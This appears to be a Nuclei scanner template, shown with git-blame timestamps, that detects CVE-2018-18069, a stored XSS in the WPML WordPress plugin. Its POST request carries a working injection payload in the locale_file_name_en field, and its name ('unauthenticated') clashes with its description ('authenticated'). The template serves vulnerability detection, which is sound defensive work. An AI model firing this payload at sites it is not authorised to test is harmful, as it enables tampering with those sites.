nuclei-templates/cves/2018/CVE-2018-18069.yaml

20 lines
735 B
YAML
Raw Normal View History

2021-01-02 05:00:39 +00:00
id: CVE-2018-18069
2020-05-14 17:54:02 +00:00
info:
name: Wordpress unauthenticated stored xss
author: nadino
2020-05-23 08:09:09 +00:00
severity: medium
2020-08-25 22:22:08 +00:00
description: process_forms in the WPML (aka sitepress-multilingual-cms) plugin through 3.6.3 for WordPress has XSS via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php request to wp-admin/admin.php.
tags: cve,cve2018,wordpress,xss
2020-05-14 17:54:02 +00:00
requests:
- method: POST
2020-05-23 08:09:09 +00:00
path:
2020-05-14 17:54:02 +00:00
- "{{BaseURL}}/wp-admin/admin.php"
2020-05-23 08:09:09 +00:00
body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN\"><html xmlns=\"hacked'
2020-05-14 17:54:02 +00:00
matchers:
- type: dsl
dsl:
- 'status_code==302 && contains(set_cookie, "_icl_current_admin_language") && contains(body, "hacked")'